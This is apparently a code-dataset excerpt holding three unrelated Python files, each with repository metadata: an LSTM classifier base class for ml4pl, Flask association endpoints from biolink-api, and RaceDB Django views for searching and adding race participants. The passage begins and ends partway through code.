from deeplearning.ml4pl.models import batch as batches
from deeplearning.ml4pl.models import classifier_base
from deeplearning.ml4pl.models import epoch
from deeplearning.ml4pl.models.lstm import lstm_utils as utils
from deeplearning.ml4pl.seq import graph2seq
from labm8.py import app
from labm8.py import humanize
from labm8.py import progress
from third_party.py.tensorflow import tf
FLAGS = app.FLAGS
# Command-line flags controlling LSTM model capacity, batching, and the
# choice of LSTM implementation.
app.DEFINE_integer(
  "lang_model_hidden_size",
  64,
  "The size of hidden layer(s) in the LSTM baselines.",
)
app.DEFINE_integer(
  "heuristic_model_hidden_size", 32, "The size of the dense output layer."
)
app.DEFINE_integer(
  "batch_size",
  64,
  "The number of padded sequences to concatenate into a batch.",
)
app.DEFINE_boolean(
  "cudnn_lstm",
  True,
  "If set, use CuDNNLSTM implementation when a GPU is available. Else use "
  "default Keras implementation. Note that the two implementations are "
  "incompatible - a model saved using one LSTM type cannot be restored using "
  "the other LSTM type.",
)
class LstmBase(classifier_base.ClassifierBase):
  """Abstract base class for LSTM models.

  Subclasses must implement GetEncoder() and CreateKerasModel(). This base
  class owns the Tensorflow session/graph lifecycle, batching, and model
  (de)serialization.
  """

  def __init__(
    self,
    *args,
    padded_sequence_length: Optional[int] = None,
    graph2seq_encoder: Optional[graph2seq.EncoderBase] = None,
    batch_size: Optional[int] = None,
    **kwargs,
  ):
    super(LstmBase, self).__init__(*args, **kwargs)
    self.batch_size = batch_size or FLAGS.batch_size

    # Determine the size of padded sequences. Use the requested
    # padded_sequence_length, or the maximum encoded length if it is shorter.
    self.padded_sequence_length = (
      padded_sequence_length or FLAGS.padded_sequence_length
    )

    self.encoder = graph2seq_encoder or self.GetEncoder()

    # After instantiating the encoder, see if we can reduce the padded
    # sequence length.
    self.padded_sequence_length = min(
      self.padded_sequence_length, self.encoder.max_encoded_length
    )

    # Reset any previous Tensorflow session. This is required when running
    # consecutive LSTM models in the same process.
    tf.compat.v1.keras.backend.clear_session()

    # Set by Initialize() and LoadModelData().
    self.session = None
    self.graph = None

  def MakeLstmLayer(self, *args, **kwargs):
    """Construct an LSTM layer.

    If a GPU is available and --cudnn_lstm, this will use NVIDIA's fast
    CuDNNLSTM implementation. Else it will use Keras' builtin LSTM, which is
    much slower but works on CPU.
    """
    # NOTE(review): an unreachable `return super().GraphReader(...)` fragment
    # that referenced undefined locals previously followed this conditional;
    # it was dead code (apparently a merge artifact) and has been removed.
    if self.gpu and FLAGS.cudnn_lstm and tf.compat.v1.test.is_gpu_available():
      return tf.compat.v1.keras.layers.CuDNNLSTM(*args, **kwargs)
    else:
      return tf.compat.v1.keras.layers.LSTM(*args, **kwargs, implementation=1)

  def CreateModelData(self) -> None:
    """Initialize an LSTM model: create the session, graph, and Keras model."""
    # Create the Tensorflow session and graph for the model.
    self.session = utils.SetAllowedGrowthOnKerasSession()
    self.graph = tf.compat.v1.get_default_graph()

    # To enable thread-safe use of a Keras model we must make sure to fix the
    # graph and session whenever we are going to use self.model.
    with self.graph.as_default():
      tf.compat.v1.keras.backend.set_session(self.session)
      self.model = self.CreateKerasModel()
      self.FinalizeKerasModel()

  def FinalizeKerasModel(self) -> None:
    """Finalize a newly instantiated keras model.

    To enable thread-safe use of the Keras model we must ensure that the
    computation graph is fully instantiated from the master thread before the
    first call to RunBatch(). Keras lazily instantiates parts of the graph
    which we can force by performing the necessary ops now:

      * training ops: make sure those are created by running the training loop
        on a small batch of data.
      * save/restore ops: make sure those are created by running save_model()
        and throwing away the generated file.

    Once we have performed those actions, we can freeze the computation graph
    to make explicit the fact that later operations are not permitted to
    modify the graph.
    """
    with self.graph.as_default():
      tf.compat.v1.keras.backend.set_session(self.session)
      # To enable thread-safe use of the Keras model we must ensure that
      # the computation graph is fully instantiated before the first call
      # to RunBatch(). Keras lazily instantiates parts of the graph (such as
      # training ops), so make sure those are created by running the training
      # loop now on a single graph.
      reader = graph_database_reader.BufferedGraphReader(
        self.graph_db, limit=self.warm_up_batch_size
      )
      batch = self.MakeBatch(epoch.Type.TRAIN, reader)
      assert batch.graph_count == self.warm_up_batch_size
      self.RunBatch(epoch.Type.TRAIN, batch)

      # Run private model methods that instantiate graph components.
      # See: https://stackoverflow.com/a/46801607
      self.model._make_predict_function()
      self.model._make_test_function()
      self.model._make_train_function()

      # Saving the graph also creates new ops, so run it now.
      with tempfile.TemporaryDirectory(prefix="ml4pl_lstm_") as d:
        self.model.save(pathlib.Path(d) / "delete_md.h5")

      # Finally we have instantiated the graph, so freeze it to make any
      # implicit modification raise an error.
      self.graph.finalize()

  @property
  def warm_up_batch_size(self) -> int:
    """Get the size of the batch used for warm-up runs of the LSTM model."""
    return 1

  def GetEncoder(self) -> graph2seq.EncoderBase:
    """Construct the graph encoder."""
    raise NotImplementedError("abstract class")

  def Summary(self) -> str:
    """Return a human-readable summary of the model and sequence settings."""
    buf = io.StringIO()
    self.model.summary(print_fn=lambda msg: print(msg, file=buf))
    print(
      "Using padded sequence length "
      f"{humanize.DecimalPrefix(self.padded_sequence_length, '')} from maximum "
      f"{humanize.DecimalPrefix(self.encoder.max_encoded_length, '')} "
      f"(max {(1 - (self.padded_sequence_length / self.encoder.max_encoded_length)):.3%} "
      "sequence truncation)",
      file=buf,
    )
    return buf.getvalue()

  @property
  def padded_vocabulary_size(self) -> int:
    # One extra token beyond the encoder vocabulary is reserved for padding.
    return self.encoder.vocabulary_size + 1

  @property
  def padding_element(self) -> int:
    # The padding token is the first id beyond the real vocabulary.
    return self.encoder.vocabulary_size

  def GetBatchOfGraphs(
    self, graph_iterator: Iterable[graph_tuple_database.GraphTuple]
  ) -> List[graph_tuple_database.GraphTuple]:
    """Read a list of <= batch_size graphs from a graph_iterator."""
    # Peel off a batch of graphs to process.
    graphs: List[graph_tuple_database.GraphTuple] = []
    while len(graphs) < self.batch_size:
      try:
        graph = next(graph_iterator)
      except StopIteration:
        # We have run out of graphs.
        break
      graphs.append(graph)
    return graphs

  def GetModelData(self) -> Any:
    """Get the model state as a binary blob."""
    # According to https://keras.io/getting-started/faq/, it is not
    # recommended to pickle a Keras model. So as a workaround, I use Keras's
    # saving mechanism to store the weights, and pickle that.
    with tempfile.TemporaryDirectory(prefix="lstm_pickle_") as d:
      path = pathlib.Path(d) / "weights.h5"
      with self.graph.as_default():
        tf.compat.v1.keras.backend.set_session(self.session)
        self.model.save(path)

      with open(path, "rb") as f:
        model_data = f.read()
    return model_data

  def LoadModelData(self, data_to_load: Any) -> None:
    """Restore the model state from a blob produced by GetModelData()."""
    # Load the weights from a file generated by ModelDataToSave().
    with tempfile.TemporaryDirectory(prefix="lstm_pickle_") as d:
      path = pathlib.Path(d) / "weights.h5"
      with open(path, "wb") as f:
        f.write(data_to_load)

      # The default TF graph is finalized in Initialize(), so we must
      # first reset the session and create a new graph.
      if self.session:
        self.session.close()
      tf.compat.v1.reset_default_graph()
      self.session = utils.SetAllowedGrowthOnKerasSession()
      self.graph = tf.compat.v1.get_default_graph()

      with self.graph.as_default():
        tf.compat.v1.keras.backend.set_session(self.session)
        self.model = tf.compat.v1.keras.models.load_model(path)
        self.FinalizeKerasModel()

  def CreateKerasModel(self) -> tf.compat.v1.keras.Model:
    """Create the LSTM model."""
    raise NotImplementedError("abstract class")

  def RunBatch(
    self,
    epoch_type: epoch.Type,
    batch: batches.Data,
    ctx: progress.ProgressContext = progress.NullContext,
  ) -> batches.Results:
    """Run a batch of data through the model.

    Args:
      epoch_type: The type of the current epoch.
      batch: A batch of graphs and model data. This requires that batch data
        has 'x' and 'y' properties that return lists of model inputs, a
        `targets` property that returns a flattened list of targets, a
        `GetPredictions()` method that receives as input the data generated
        by model and returns a flattened array of the same shape as `targets`.
      ctx: A logging context.

    Returns:
      A batches.Results tuple of targets, predictions, and (for training
      epochs) the loss.
    """
    # We can only get the loss on training.
    loss = None
    with self.graph.as_default():
      tf.compat.v1.keras.backend.set_session(self.session)
      if epoch_type == epoch.Type.TRAIN:
        loss, *_ = self.model.train_on_batch(batch.data.x, batch.data.y)
      predictions = self.model.predict_on_batch(batch.data.x)

    return batches.Results.Create(
      targets=batch.data.targets,
      predictions=batch.data.GetPredictions(predictions, ctx=ctx),
      loss=loss,
    )
| [
"[email protected]"
] | |
be166e9147de70c62d3f58a25394cfa3dbf8ba87 | 6469e5689c5888481a5eb1c2d37e057c42e2afc3 | /biolink/api/link/endpoints/associations_from.py | 068338308ebe6c4ba78cebb9d5f045be2ad9c4f7 | [] | no_license | othreecodes/biolink-api | 66e2b171da0f112f124c5adc8bf2a3a23d78ce1a | 37761acba24ff5045fb65b16b009fdaa0fafa03e | refs/heads/master | 2021-05-09T00:34:32.199397 | 2018-01-31T22:10:08 | 2018-01-31T22:10:08 | 119,743,095 | 2 | 0 | null | 2018-01-31T21:03:53 | 2018-01-31T21:03:52 | null | UTF-8 | Python | false | false | 3,655 | py | import logging
from flask import request
from flask_restplus import Resource
from biolink.datamodel.serializers import association, association_results
from biolink.api.restplus import api
from ontobio.golr.golr_associations import get_association, search_associations
import pysolr
log = logging.getLogger(__name__)

ns = api.namespace('association', description='Retrieve associations between entities')

# Shared query-string parser for every association endpoint in this module.
# Each add_argument below declares one accepted URL query parameter.
parser = api.parser()
parser.add_argument('subject_taxon', help='SUBJECT TAXON id, e.g. NCBITaxon:9606. Includes inferences by default (higher level taxa can be used)')
parser.add_argument('evidence', help="""Object id, e.g. ECO:0000501 (for IEA; Includes inferred by default)
or a specific publication or other supporting ibject, e.g. ZFIN:ZDB-PUB-060503-2.
""")
parser.add_argument('graphize', type=bool, help='If set, includes graph object in response')
parser.add_argument('fl_excludes_evidence', type=bool, help='If set, excludes evidence objects in response')
# Pagination controls.
parser.add_argument('page', type=int, required=False, default=1, help='Return results starting with this row number')
parser.add_argument('rows', type=int, required=False, default=10, help='limit on number of rows')
parser.add_argument('map_identifiers', help='Prefix to map all IDs to. E.g. NCBIGene, HP, OMIM, DOID')
parser.add_argument('subject_category', help='e.g. gene, genotype, disease, function (todo: use enum)')
parser.add_argument('object_category', help='e.g. disease, phenotype, gene')
parser.add_argument('slim', action='append', help='Map objects up (slim) to a higher level category. Value can be ontology class ID or subset ID')
parser.add_argument('use_compact_associations', type=bool, help='If true, returns results in compact associations format')
@ns.route('/from/<subject>')
@api.doc(params={'subject': 'Return associations emanating from this node, e.g. specifying NCBIGene:84570 will return gene-phenotype, gene-function etc for this gene'})
class AssociationsFrom(Resource):

    @api.expect(parser)
    @api.marshal_list_with(association_results)
    def get(self, subject):
        """
        Returns list of matching associations starting from a given subject (source)
        """
        args = parser.parse_args()
        # Delegate to the Golr search; the path parameter anchors the source node,
        # all remaining filters come from the shared query-string parser.
        return search_associations(subject=subject, **args)
@ns.route('/to/<object>')
@api.doc(params={'object': 'Return associations pointing to this node. E.g. specifying MP:0013765 will return all genes, variants, strains etc annotated with this term. Can also be a biological entity such as a gene'})
class AssociationsTo(Resource):

    @api.expect(parser)
    @api.marshal_list_with(association_results)
    def get(self, object):
        """
        Returns list of matching associations pointing to a given object (target)
        """
        args = parser.parse_args()
        # Delegate to the Golr search; the path parameter anchors the target node.
        return search_associations(object=object, **args)
@ns.route('/between/<subject>/<object>')
@api.doc(params={'subject': 'E.g. e.g. MGI:1342287'})
@api.doc(params={'object': 'E.g. e.g. MP:0013765, can also be a biological entity such as a gene'})
class AssociationsBetween(Resource):

    @api.expect(parser)
    @api.marshal_list_with(association_results)
    def get(self, subject, object):
        """
        Returns associations connecting two entities

        Given two entities (e.g. a particular gene and a particular disease), if these two entities
        are connected (directly or indirectly), then return the association objects describing
        the connection.
        """
        args = parser.parse_args()
        # BUG FIX: `subject` was previously dropped from the query, so this
        # endpoint returned *every* association pointing at `object` instead of
        # only those linking the two entities. Constrain the search on both ends.
        return search_associations(subject=subject, object=object, **args)
| [
"[email protected]"
] | |
92f8fb6e5871b18adc000d139f6b985917318f5a | 89afb47648305068fa7ca75164052da20c7c7eb4 | /core/participant.py | 3f2f4852cd44bae79844df23cdf6c20c329d3133 | [] | no_license | cclague/RaceDB | a0bc21c750049a0bf0d2f79fc1e9f88c60775b01 | e760138436d1f9ee0745bf58e10b68ebc99dc8a9 | refs/heads/master | 2023-01-30T12:49:34.707725 | 2020-12-08T21:37:28 | 2020-12-08T21:37:28 | 319,435,453 | 0 | 0 | null | 2020-12-08T21:37:29 | 2020-12-07T20:24:27 | null | UTF-8 | Python | false | false | 73,673 | py | import uuid
from subprocess import Popen, PIPE
import traceback
import operator
from django.utils.translation import ugettext_lazy as _
from django.utils.safestring import mark_safe
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from .views_common import *
from .views import BarcodeScanForm, RfidScanForm
from .get_id import get_id
from .CountryIOC import ioc_country
from .print_bib import print_bib_tag_label, print_id_label, print_body_bib, print_shoulder_bib
from .participant_key_filter import participant_key_filter, participant_bib_filter
from .get_participant_excel import get_participant_excel
from .emails import show_emails
from .gs_cmd import gs_cmd
from .ReadWriteTag import ReadTag, WriteTag
def get_participant( participantId ):
	'''Resolve a Participant by primary key (404 on a miss) and normalize its
	RFID tag fields via enforce_tag_constraints before handing it back.'''
	p = get_object_or_404( Participant, pk=participantId )
	return p.enforce_tag_constraints()
@autostrip
class ParticipantSearchForm( Form ):
	'''Search/filter form for the Participants list screen.

	Field names correspond to keys of the session-stored participant_filter
	dict consumed by the Participants view.  Tri-state choice fields use
	2 = no filter, 0 = No, 1 = Yes.  The 'category', 'event' and 'role_type'
	choices are populated dynamically in __init__ from the competition.
	'''
	scan = forms.CharField( required=False, label = _('Scan Search'), help_text=_('Searches License and RFID Tag only') )
	event = forms.ChoiceField( required=False, label = _('Event'), help_text=_('For faster response, review one Event at a time') )
	name_text = forms.CharField( required=False, label = _('Name') )
	gender = forms.ChoiceField( required=False, choices = ((2, '----'), (0, _('Men')), (1, _('Women'))), initial = 2 )
	category = forms.ChoiceField( required=False, label = _('Category') )
	bib = forms.IntegerField( required=False, min_value = -1 , label=_('Bib (-1 for Missing Bib)') )
	rfid_text = forms.CharField( required=False, label = _('RFIDTag (-1 for Missing)') )
	eligible = forms.ChoiceField( required=False, choices = ((2, '----'), (0, _('No')), (1, _('Yes'))), label = _('Eligible') )
	paid = forms.ChoiceField( required=False, choices = ((2, '----'), (0, _('No')), (1, _('Yes'))), label = _('Paid') )
	confirmed = forms.ChoiceField( required=False, choices = ((2, '----'), (0, _('No')), (1, _('Yes'))), label = _('Confirmed') )
	team_text = forms.CharField( required=False, label = _('Team (-1 for Independent)') )
	role_type = forms.ChoiceField( required=False, label = _('Role Type') )
	city_text = forms.CharField( required=False, label = _('City') )
	state_prov_text = forms.CharField( required=False, label = _('State/Prov') )
	nationality_text = forms.CharField( required=False, label = _('Nationality') )
	complete = forms.ChoiceField( required=False, choices = ((2, '----'), (0, _('No')), (1, _('Yes'))), label = _('Complete') )
	has_events = forms.ChoiceField( required=False, choices = ((2, '----'), (0, _('None')), (1, _('Some'))), label = _('Has Events') )

	def __init__(self, *args, **kwargs):
		# 'competition' is a custom kwarg; it must be popped before the base
		# Form.__init__ sees the kwargs.
		competition = kwargs.pop( 'competition', None )
		super(ParticipantSearchForm, self).__init__(*args, **kwargs)

		if competition:
			# Category choices: -1 = no filter, -2 = participants missing a category.
			self.fields['category'].choices = \
				[(-1, '----')] + [(-2, _('*** Missing ***'))] + [(category.id, category.code_gender) for category in competition.get_categories()]
			events = sorted( competition.get_events(), key = operator.attrgetter('date_time') )
			# Event choices are encoded as "<event_type>.<event_id>" strings,
			# decoded by the Participants view ('-1.0' means all events).
			self.fields['event'].choices = \
				[(u'-1.0', _('All'))] + [(u'{}.{}'.format(event.event_type, event.id), u'{} {}'.format(event.short_name, timezone.localtime(event.date_time).strftime('%Y-%m-%d %H:%M:%S'))) for event in events]

		# Role types come straight from Participant.ROLE_NAMES; slot 0 doubles
		# as the "no filter" option.
		roleChoices = [(i, role) for i, role in enumerate(Participant.ROLE_NAMES)]
		roleChoices[0] = (0, '----')
		self.fields['role_type'].choices = roleChoices

		# crispy-forms layout: one row for scan/event, one row of filters, one row of buttons.
		self.helper = FormHelper( self )
		self.helper.form_action = '.'
		self.helper.form_class = 'form-inline search'

		button_args = [
			Submit( 'search-submit', _('Search'), css_class = 'btn btn-primary' ),
			Submit( 'clear-submit', _('Clear Search'), css_class = 'btn btn-primary' ),
			CancelButton( _('OK'), css_class='btn btn-primary' ),
			Submit( 'emails-submit', _('Emails'), css_class = 'btn btn-primary' ),
			Submit( 'export-excel-submit', _('Export to Excel'), css_class = 'btn btn-primary' ),
		]

		self.helper.layout = Layout(
			Row( Field('scan', size=20, autofocus=True ), HTML(' '*8), Field('event'),),
			Row( *(
					[Field('name_text'), Field('gender'), Field('category'), Field('bib'),] +
					# The RFID filter is only shown when the competition uses tags.
					([Field('rfid_text'),] if competition and competition.using_tags else []) +
					[Field('eligible'), Field('paid'), Field('confirmed'), Field('team_text'), Field('role_type'),] +
					[Field('city_text'), Field('state_prov_text'), Field('nationality_text'), ] +
					[Field('complete'), Field('has_events'), ]
				)
			),
			Row( *(button_args[:-2] + [HTML(' '*8)] + button_args[-2:]) ),
		)
@access_validation()
def Participants( request, competitionId ):
	'''Main participant list view: applies the session-stored search filter,
	paginates the result and renders participant_list.html.

	POST buttons handled here: clear-submit (reset filter), search-submit
	(store new filter), export-excel-submit and emails-submit.

	NOTE: this view renders with locals(), so every local variable name is
	part of the template context - do not rename locals casually.
	'''
	ParticipantsPerPage = 25

	competition = get_object_or_404( Competition, pk=competitionId )

	# The filter and the current page are persisted per-competition in the session.
	pfKey = 'participant_filter_{}'.format( competitionId )
	pageKey = 'participant_filter_page_{}'.format( competitionId )
	participant_filter = request.session.get(pfKey, {})

	def getPaginator( participants ):
		# Paginate and remember the page in the session so navigation returns
		# to the same page.
		paginator = Paginator( participants, ParticipantsPerPage )
		page = request.GET.get('page',None) or request.session.get(pageKey,None)
		try:
			participants = paginator.page(page)
		except PageNotAnInteger:
			# If page is not an integer, deliver first page.
			page = 1
			participants = paginator.page(page)
		except EmptyPage:
			# If page is out of range (e.g. 9999), deliver last page of results.
			page = paginator.num_pages
			participants = paginator.page(page)
		request.session[pageKey] = page
		return participants, paginator

	if request.method == 'POST':
		if 'clear-submit' in request.POST:
			request.session[pfKey] = {}
			request.session[pageKey] = None
			return HttpResponseRedirect(getContext(request,'path'))

		form = ParticipantSearchForm( request.POST, competition=competition )
		if form.is_valid():
			participant_filter = form.cleaned_data
			request.session[pfKey] = participant_filter
			request.session[pageKey] = None
	else:
		form = ParticipantSearchForm( competition = competition, initial = participant_filter )

	#-------------------------------------------------------------------
	# Decode the "<event_type>.<event_id>" filter value; any parse failure
	# falls back to "all events".
	event = None
	try:
		event_type, event_pk = [int(v) for v in participant_filter.get('event', '-1.0').split('.')]
	except:
		event_type, event_pk = None, None
	if event_type == 0:
		event = competition.eventmassstart_set.filter(pk=event_pk).first()
	elif event_type == 1:
		event = competition.eventtt_set.filter(pk=event_pk).first()

	participants = event.get_participants() if event else competition.participant_set.all()

	# Summary counts shown in the template header.
	competitors = participants.filter( role=Participant.Competitor )
	missing_category_count = competitors.filter( category__isnull=True ).count()
	missing_bib_count = competitors.filter( bib__isnull=True ).count()

	# Build the "bad tag" query used both for the count and the rfid '-1' filter.
	if competition.using_tags:
		if competition.do_tag_validation:
			# Show checked tags.
			bad_tag_query = Q(tag_checked=False)
		else:
			# Show empty tags.
			if competition.use_existing_tags:
				bad_tag_query = Q(license_holder__existing_tag__isnull=True) | Q(license_holder__existing_tag=u'')
			else:
				bad_tag_query = Q(tag__isnull=True) | Q(tag=u'')
	else:
		bad_tag_query = Q()
	bad_tag_count = competitors.filter( bad_tag_query ).count() if competition.using_tags else 0

	# Scan search short-circuits all the other filters: match all scan terms
	# against the search_text and render immediately.
	if participant_filter.get('scan',0):
		name_text = utils.normalizeSearch( participant_filter['scan'] )
		names = name_text.split()
		if names:
			q = Q()
			for n in names:
				q |= Q(license_holder__search_text__contains = n)
			participants = participants.filter( q ).select_related('team', 'license_holder')
			participants, paginator = getPaginator( participants )
			return render( request, 'participant_list.html', locals() )

	# ---- Database-level filters (each narrows the queryset) ----
	if participant_filter.get('bib',None) is not None:
		bib = participant_filter['bib']
		if bib <= 0:
			# bib <= 0 means "participants missing a bib".
			participants = participants.filter( bib__isnull=True )
		else:
			participants = participants.filter( bib=bib )

	# Role types are banded in blocks of 100 (see Participant role encoding).
	role_type = int(participant_filter.get('role_type',0))
	if role_type > 0:
		participants = participants.filter( role__range=(100*role_type, 100*role_type+99) )

	if 0 <= int(participant_filter.get('gender',-1)) <= 1:
		participants = participants.filter( license_holder__gender=participant_filter['gender'])

	category_id = int(participant_filter.get('category',-1))
	if category_id > 0:
		participants = participants.filter( category__id=category_id )
	elif category_id == -2:
		# -2 is the "*** Missing ***" category choice.
		participants = participants.filter( category__isnull=True )

	if 0 <= int(participant_filter.get('confirmed',-1)) <= 1:
		participants = participants.filter( confirmed=bool(int(participant_filter['confirmed'])) )

	if 0 <= int(participant_filter.get('paid',-1)) <= 1:
		participants = participants.filter( paid=bool(int(participant_filter['paid'])) )

	if 0 <= int(participant_filter.get('eligible',-1)) <= 1:
		participants = participants.filter( license_holder__eligible=bool(int(participant_filter['eligible'])) )

	participants = participants.select_related('team', 'license_holder')

	# ---- Python-level filters ----
	# object_checks holds predicates that cannot be expressed (or are not
	# expressed) as queryset filters; failing rows are excluded afterwards.
	object_checks = []

	if participant_filter.get('name_text','').strip():
		name_text = utils.normalizeSearch( participant_filter['name_text'] )
		names = name_text.split()

		if names:
			for n in names:
				participants = participants.filter( license_holder__search_text__contains=n )

			# Re-check against the diacritic-stripped full name to avoid false
			# positives from the flattened search_text.
			def name_filter( p ):
				lh_name = utils.removeDiacritic(p.license_holder.full_name()).lower()
				return all(n in lh_name for n in names)

			object_checks.append( name_filter )

	# Create a search function so we get a closure for the search text in the iterator.
	def search_license_holder( search_text, field ):
		search_fields = utils.normalizeSearch( search_text ).split()
		if search_fields:
			object_checks.append( lambda p: utils.matchSearchFields(search_fields, getattr(p.license_holder, field)) )

	for field in ('city', 'state_prov', 'nationality'):
		search_field = field + '_text'
		if participant_filter.get(search_field,'').strip():
			search_license_holder(
				participant_filter[search_field],
				field
			)

	team_search = participant_filter.get('team_text','').strip()
	if team_search:
		if team_search == '-1' or Team.is_independent_name(team_search):
			# '-1' (or an "independent" team name) selects riders with no team.
			participants = participants.filter( team__isnull = True )
		else:
			participants = participants.filter( team__isnull = False )
			q = Q()
			for t in team_search.split():
				q &= Q( team__search_text__contains=t )
			participants = participants.filter( q )

	if 0 <= int(participant_filter.get('complete',-1) or 0) <= 1:
		complete = bool(int(participant_filter['complete']))
		if complete:
			participants = participants.filter( Participant.get_can_start_query(competition) )
		else:
			participants = participants.exclude( Participant.get_can_start_query(competition) )
		object_checks.append( lambda p: bool(p.is_done) == complete )

	if competition.using_tags and participant_filter.get('rfid_text',''):
		rfid = participant_filter.get('rfid_text','').upper()
		if rfid == u'-1':
			# '-1' selects participants with a missing/unvalidated tag.
			participants = participants.filter( bad_tag_query )
		else:
			if competition.use_existing_tags:
				participants = participants.filter( license_holder__existing_tag=rfid )
			else:
				participants = participants.filter( tag=rfid )

	has_events = int(participant_filter.get('has_events',-1))
	if has_events == 0:
		participants = participants.filter( role = Participant.Competitor )
		object_checks.append( lambda p: not p.has_any_events() )
	elif has_events == 1:
		object_checks.append( lambda p: p.has_any_events() )

	if object_checks:
		# Evaluate the Python-level predicates and exclude failures from the
		# queryset (capped at 800 pks to keep the SQL IN clause bounded).
		failed = [p for p in participants if not all(oc(p) for oc in object_checks)]
		if failed:
			participants = participants.exclude( pk__in=[p.pk for p in failed][:800] )

	if request.method == 'POST':
		if 'export-excel-submit' in request.POST:
			xl = get_participant_excel( Q(pk__in=participants.values_list('pk',flat=True)) )
			response = HttpResponse(xl, content_type="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet")
			response['Content-Disposition'] = 'attachment; filename=RaceDB-Participants-{}.xlsx'.format(
				datetime.datetime.now().strftime('%Y-%m-%d-%H%M%S'),
			)
			return response
		if 'emails-submit' in request.POST:
			return show_emails( request, participants=participants )

	participants, paginator = getPaginator( participants )
	return render( request, 'participant_list.html', locals() )
#-----------------------------------------------------------------------
@access_validation()
def ParticipantsInEvents( request, competitionId ):
	'''Render a cross-tab of every participant against every event of the
	competition, marking each cell with a unicode check-code:

		optional event, selected      -> ballot box with check (u2611)
		optional event, not selected  -> empty ballot box (u2610)
		non-optional event, entered   -> check mark (u2713)
		not entered, not optional     -> blank
	'''
	competition = get_object_or_404( Competition, pk=competitionId )
	competition_events = sorted( competition.get_events(), key=operator.attrgetter('date_time') )
	event_participants = { event:set(event.get_participants()) for event in competition_events }
	# BUG FIX: use set().union(...) so a competition with no events yields an
	# empty participant list instead of raising TypeError
	# (set.union(*[]) calls the unbound method with no arguments).
	participants = sorted( set().union(*event_participants.values()), key=lambda p: p.license_holder.search_text )

	check_codes = {
		'optional_selected': u"\u2611",
		'optional_deselected': u"\u2610",
		'default_selected': u"\u2713",
		'unavailable': u"",
	}
	# Attach a per-event status list to each participant for the template.
	for participant in participants:
		event_status = []
		for event in competition_events:
			if participant in event_participants[event]:
				event_status.append( check_codes['optional_selected' if event.optional else 'default_selected'] )
			elif event.optional:
				event_status.append( check_codes['optional_deselected'] )
			else:
				event_status.append( check_codes['unavailable'] )
		participant.event_status = event_status

	return render( request, 'participants_in_events.html', locals() )
@autostrip
class BibScanForm( Form ):
	'''Single-field form used to add/look up a participant by bib number.'''
	bib = forms.IntegerField( required = False, label = _('Bib') )

	def __init__(self, *args, **kwargs):
		# Custom kwarg: suppress the Cancel button (used on the add-by-bib screen).
		hide_cancel_button = kwargs.pop('hide_cancel_button', None)
		super(BibScanForm, self).__init__(*args, **kwargs)

		self.helper = FormHelper( self )
		self.helper.form_action = '.'
		self.helper.form_class = 'navbar-form navbar-left'

		button_args = [
			Submit( 'search-submit', _('Search'), css_class = 'btn btn-primary' ),
			CancelButton(),
		]
		if hide_cancel_button:
			button_args = button_args[:-1]

		self.helper.layout = Layout(
			Row(
				Field('bib', size=10),
			),
			Row( *button_args ),
		)
@access_validation()
def ParticipantBibAdd( request, competitionId ):
	'''Add/find a participant by bib number.

	Redirect targets depend on what the bib matches:
	  - exactly one existing participant -> ParticipantEdit
	  - exactly one license holder (not yet entered) -> LicenseHolderAddConfirm
	  - anything else -> the scan-error page.
	Renders with locals(); local names are template context.
	'''
	competition = get_object_or_404( Competition, pk=competitionId )
	add_by_bib = True	# flag read by the template to select the bib-entry UI
	if request.method == 'POST':
		form = BibScanForm( request.POST, hide_cancel_button=True )
		if form.is_valid():
			bib = form.cleaned_data['bib']
			if not bib:
				# Empty bib: just reload the page.
				return HttpResponseRedirect(getContext(request,'path'))

			license_holders, participants = participant_bib_filter( competition, bib )
			if len(participants) == 1 and len(license_holders) == 0:
				return HttpResponseRedirect(pushUrl(request,'ParticipantEdit', participants[0].id))
			if len(participants) == 0 and len(license_holders) == 1:
				return HttpResponseRedirect(pushUrl(request,'LicenseHolderAddConfirm', competition.id, license_holders[0].id))
			# Ambiguous or no match: show the error page with the candidates.
			return render( request, 'participant_scan_error.html', locals() )
	else:
		form = BibScanForm( hide_cancel_button=True )
	return render( request, 'participant_add_bib.html', locals() )
#-----------------------------------------------------------------------
@access_validation()
def ParticipantManualAdd( request, competitionId ):
	'''Search license holders by name to add one to the competition manually.

	The search text is persisted in the session ('participant_new_filter').
	The 'new-submit' button routes to the new-license-holder flow.
	Renders with locals(); local names are template context.
	'''
	competition = get_object_or_404( Competition, pk=competitionId )

	search_text = request.session.get('participant_new_filter', '')
	btns = [('new-submit', 'New License Holder', 'btn btn-success')]
	add_by_manual = True	# flag read by the template to select the manual-add UI

	if request.method == 'POST':
		if 'new-submit' in request.POST:
			return HttpResponseRedirect( pushUrl(request,'ParticipantNotFound', competition.id) )

		form = SearchForm( btns, request.POST, hide_cancel_button=True )
		if form.is_valid():
			search_text = form.cleaned_data['search_text']
			request.session['participant_new_filter'] = search_text
	else:
		form = SearchForm( btns, initial = {'search_text': search_text}, hide_cancel_button=True )

	# All search terms must appear in the license holder's search_text.
	search_text = utils.normalizeSearch( search_text )
	q = Q( active = True )
	for term in search_text.split():
		q &= Q(search_text__contains = term)
	license_holders = LicenseHolder.objects.filter(q).order_by('search_text')[:MaxReturn]

	# Flag which license_holders are already entered in this competition.
	license_holders_in_competition = set( p.license_holder.id
		for p in Participant.objects.select_related('license_holder').filter(competition=competition) )

	add_multiple_categories = request.user.is_superuser or SystemInfo.get_singleton().reg_allow_add_multiple_categories

	return render( request, 'participant_add_list.html', locals() )
@access_validation()
def ParticipantAddToCompetition( request, competitionId, licenseHolderId ):
	'''Create a Participant record for the license holder in this competition
	and redirect to its edit page.  If the participant already exists, reuse it.
	'''
	competition = get_object_or_404( Competition, pk=competitionId )
	license_holder = get_object_or_404( LicenseHolder, pk=licenseHolderId )

	participant = Participant( competition=competition, license_holder=license_holder, preregistered=False ).init_default_values().auto_confirm()

	try:
		# Fails if the license_holder is non-unique.
		participant.save()
		participant.add_to_default_optional_events()
	except IntegrityError as e:
		# Recover silently by going directly to edit screen with the existing participant.
		participant = Participant.objects.filter( competition=competition, license_holder=license_holder ).first()

	return HttpResponseRedirect('{}ParticipantEdit/{}/'.format(getContext(request,'pop2Url'), participant.id))
@access_validation()
def ParticipantAddToCompetitionDifferentCategory( request, competitionId, licenseHolderId ):
	'''Add the license holder to the competition a second time with no category
	(so a different category can be chosen), then redirect to the edit page.

	Order of attempts:
	  1. an existing category-less participant record -> reuse it;
	  2. any existing participant -> clone it (id=None forces an INSERT on save)
	     with category/bib cleared and role reset to Competitor;
	  3. otherwise fall back to the plain add-to-competition flow.
	'''
